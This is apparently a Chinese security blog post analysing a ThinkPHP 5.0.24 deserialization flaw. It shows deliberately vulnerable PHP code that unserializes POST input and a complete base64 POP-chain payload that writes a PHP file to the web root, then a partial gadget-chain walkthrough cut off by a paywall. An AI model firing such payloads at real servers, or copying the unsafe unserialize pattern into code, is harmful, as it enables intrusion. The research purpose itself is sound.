ThinkPHP5.0.24_反序列化漏洞在Linux下的写马分析

最新推荐文章于 2022-10-20 16:02:54 发布
最新推荐文章于 2022-10-20 16:02:54 发布
阅读量4.5k 收藏 4
点赞数 1
分类专栏: 代码审计 ThinkPHP 文章标签: 安全漏洞 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53264525/article/details/121451730
版权

ThinkPHP5.0.24_反序列化漏洞在Linux下的写马分析

  • ThinkPHP5.0.24
  • 漏洞代码
    <?php
namespace app\index\controller;

class Index
{
     
    public function test01(){
     
        $code = $_POST['code'];
        unserialize(base64_decode($code));
    }
}
  • payload
    /index.php/index/index/test01
POST
code=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

漏洞分析

  1. 入口点还是Windows::__destruct,通过removeFiles方法调用__toString方法,TP5.1.37反序列化中利用的是Conversion::__toString,但是在TP5.0.24中没有这个类,这里使用Model::__toString
    image-20211115100502359
  2. 经过Model::__toString->Model::toJson->Model::toArray调用链后进入toArray方法,需要在toArray方法中寻找可控对象->类方法(可控变量),这里有如下四个
    $item[$key] = $relation->append($name)->toArray();
$item[$key] = $relation->append([$attr])->toArray();
$bindAttr = $modelRelation->getBindAttr();
$item[$key]
最低0.47元/天 解锁文章
0x6b79
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Thinkphp 5.0.24变量覆盖漏洞导致RCE分析
geejkse_seff的博客
07-29 1656
好了,回到正题,继续跟进到877行,
2024年最新ThinkPHP漏洞合集(专注渗透视角)_thinkphp v6,2024年最新我把所有网络安全框架整理成了PDF
最新发布
2301_79985178的博客
05-06 1115
*漏洞原理:**ThinkPHP是在中国使用极为广泛的PHP开发框架。在其版本5中,由于框架错误地处理了控制器名称,因此如果网站未启用强制路由(默认设置),则该框架可以执行任何方法,从而导致RCE漏洞。docker ps**漏洞原理:**ThinkPHP是在中国使用极为广泛的PHP开发框架。
thinkphp5.0.24反序列化漏洞分析
Sk1y的博客
06-22 1万+
thinkphp5.0.24 反序列化漏洞分析 thinkphp5框架:thinkphp5的入口文件在,访问 一个反序列化入口点全局搜索函数中的函数,调用了removeFiles()跟进removeFiles(),第163行的file_exists可以触发方法全局搜索在的第2265行,发现其调用了跟进,发现其调用了toArray()方法(在Model.php中)跟进,发现其有三处可以调用方法(就是整一个可以控制的类对象,然后让其调用该类不存在的方法,然后触发魔术方法)着重看第三处,...
TP 5.0.24反序列化漏洞分析
goddemon
10-20 6257
很久没发过文章了,最近在研究审计链条相关的东西,codeql,ast,以及一些java的东西很多东西还是没学明白就先不出来丢人了,这篇tp的原因呢虽然这个漏洞分析文章蛮多了,但是还是跟着看了下,一方面是因为以前对pop链挖掘一直学的懵懵懂懂的 ctf的一些pop链能出,但是到了框架里面自己就是挖不出来,所以就想着自己挖下tp反序列化的链子来看看,另一方面是想思考学习下php挖掘利用ast手法去该怎么入手(虽然后面这个问题还没解决),所以就有了这篇文章。
ThinkPHP漏洞大全
热门推荐
FY10033的博客
05-04 1万+
tp5payload大全 https://github.com/SkyBlueEternal/thinkphp-RCE-POC-Collection tp5参考文献 https://blog.csdn.net/weixin_40709439/article/details/86564457 tp版本发现 1.使用错误的路径 2.采用错误的参数 1.版本5.0.x<5.0.23 1.0 5.0.x-5.0.23通杀RCE-payload # 第一个 http://127.0.0.1/cms/thi
bfengj#CTF#thinkphp5.0.24反序列化rce1
07-25
thinkphp5.0.24反序列化rceModel是抽象类protected $append = [];// $value值,作为call函数引用的第二变量p
thinkphp_5.0.24_with_extend
01-24
1. **ThinkPHP 5.0.24核心特性**:此版本在设计上遵循了SOLID原则,增强了模块化设计,支持命名空间,使得代码组织更加清晰。此外,它引入了全新的路由系统,提供更灵活的URL映射,支持RESTful API设计。错误处理和...
ThinkPHP 5.0.24 核心版
11-05
2. 企业级应用:在大型企业项目中,ThinkPHP 5.0.24的模块化设计、强大的权限管理以及优秀的性能优化能力,使其成为理想的后台开发框架。 3. API开发:通过灵活的路由和数据操作API,ThinkPHP 5.0.24可以轻松构建...
ThinkPHP_full_v5.0.24_PHP开发框架_
10-02
ThinkPHP是一个免费开源的,... ThinkPHP借鉴了国外很多优秀的框架和模式。 使用ThinkPHP,你可以更方便和快捷的开发和部署应用。当然不仅仅是企业级应用,任何PHP应用开发都可以从ThinkPHP的简单 和快速的特性中受益。
tp5漏洞利用工具.zip
01-03
Thinkphp5代码执行漏洞利用工具 (一共两个 包含利用原理)只要检测到存在Thinkphp5漏洞都能直接getshell(没狗的情况下)
Thinkphp5.0.x_RCE复现&5.0.24反序列化大礼包
大博的博客
08-07 6351
环境部署 以TP5.0.22为例 + PHP 5.6.27-NTS + phpstorm2020.1 反序列化环境为:TP5.0.24 + PHP 5.6.27-NTS + phpstorm2020.1 漏洞成因 现在TP的RCE通常将其分成两类: Request类其中变量被覆盖导致RCE 路由控制不严谨导致可以调用任意类致使RCE 反序列化的应用(需要存在反序列化的地方) Request类其中变量被覆盖导致RCE 我们以这个POC为例,进行复现: 我们正常的代码逻辑已经简单的在了前文,如有代码执行疑
Thinkphp5.0 反序列化漏洞复现
feng的博客
03-11 2041
前言 环境创建: composer create-project topthink/think=5.0.14 thinkphp5.0.14 "require": { "php": ">=5.4.0", "topthink/framework": "5.0.14" }, composer update
thinkphp v5.0.24 密码爆破_实战技巧|利用ThinkPHP5.X的BUG实现数据库信息泄露
weixin_39913472的博客
11-25 7218
文章来源:NearSec记录一下渗透过程中的思路以及遇到的难点,不足之处还请各位大佬多多包涵。拿到目标站点:http://**.****.cn首先针对目标进行子域名收集发现存在http://t**.****.cn域名,为测试系统URL后面随便输入个目录,发现是ThinkPHP 3.2.3的系统,目前公开渠道没有可直接GetShell的漏洞尝试加上/admin可以进入到后台登录页,使用Burp挂载弱...
Thinkphp 5.0.24反序列化漏洞导致RCE分析
weixin_43263451的博客
03-27 1万+
1. 概述 总体思路就是先全局搜索可以利用的魔法函数作为入口,比如__destruct,然后再一步步构造pop链往漏洞触发点跳 根据大佬的指点漏洞触发点在thinkphp/library/think/console/Output.php的__call方法 public function __call($method, $args) { if (in_array($method, $this->styles)) { array_unshift($args,
Thinkphp 5.0.24反序列化漏洞修复方案
笨鸟的博客
11-24 7925
Thinkphp 5.0.24存在反序化漏洞,入口点在thinkphp/library/think/process/pipes/Windows.php中__destruct魔术方法。 网上有很多讲解如何利用这个漏洞进行攻击,百度Thinkphp 5.0.24反序化漏洞会出来一堆。 但是如何修复这个漏洞没有讲解,我去Thinkphp 官网上也没有查到,我的建议一个是升级Thinkphp版本。 下面是我的修复方案: 第1种方案:修改removeFiles方法如下: /** * 删除
ThinkPHP v6.0.7 eval反序列化漏洞分析与利用
"ThinkPHP v6.0.7 eval反序列化漏洞利用链解析" 这篇文章主要讨论了ThinkPHP框架的一个安全问题,即在版本6.0.7中的一个eval反序列化利用链。作者指出,虽然在之前的ThinkPHP v6.0.x版本中存在反序列化链条,但无法...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值